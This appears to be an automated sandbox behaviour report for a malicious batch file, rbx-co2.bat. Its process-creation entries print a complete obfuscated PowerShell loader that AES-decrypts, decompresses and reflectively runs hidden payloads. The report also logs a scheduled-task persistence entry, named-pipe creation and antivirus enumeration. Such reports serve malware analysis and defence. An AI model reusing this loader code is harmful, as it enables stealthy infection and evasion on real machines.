(,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:thuufdhjxkhq{param([outputtype([type])][parameter(position=0)][type[]]$yflwifejwhebpy,[parameter(position=1)][type]$nxinipbkxv)$ymlvqpdcphk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+'l'+''+[char](101)+'ct'+[char](101)+'d'+'d'+''+[char](101)+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+'o'+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+''+[char](101)+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+'s'+[char](44)+''+[char](80)+''+'u'+''+[char](98)+'l'+[char](105)+''+[char](99)+','+[char](83)+''+[char](101)+''+[char](97)+''+'l'+''+'e'+''+[char](100)+''+[char](44)+'a'+[char](110)+''+[char](115)+'i'+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+'',[multicastdelegate]);$ymlvqpdcphk.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+'e,'+'h'+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+'y'+'s'+[char](105)+''+'g'+''+','+''+[char](80)+'u'+[char](98)+''+'l'+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$yflwifejwhebpy).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+'me,m'+[char](97)+''+'n'+''+'a'+''+[char](103)+''+'e'+'d');$ymlvqpdcphk.definemethod(''+'i'+''+'n'+'v'+[char](111)+'k'+[char](101)+'',''+'p'+''+'u'+''+'b'+'li'+'c'+''+','+''+'h'+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+''+'g'+''+[char](44)+''+[char](78)+''+'e'+''+'w'+''+[char](83)+''+'l'+'o'+[char](116)+','+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+''+[char](108)+'',$nxinipbkxv,$yflwifejwhebpy).setimplementationflags(''+[char](82)+'unt'+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+'a'+[char](103)+''+'e'+''+[char](100)+'');write-output $ymlvqpdcphk.createtype();}$tbozpeexdclpo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+''+'m'+''+'.'+''+[char](100)+'l'+'l'+'')}).gettype(''+[char](77)+'icr'+'o'+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+'n'+[char](51)+''+'2'+''+[char](46)+''+[char](85)+''+[char](110)+''+[char](115)+'af'+[char](101)+''+[char](78)+'a'+[char](116)+''+'i'+''+'v'+''+'e'+'met'+[char](104)+''+'o'+''+[c
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
Source: dwm.exe, 0000002A.00000000.2786292411.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.3476487461.000001D159439000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3E2AF0 cpuid 17_3_00000253FC3E2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC408090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_00000253FC408090
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr, Amcache.hve.11.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
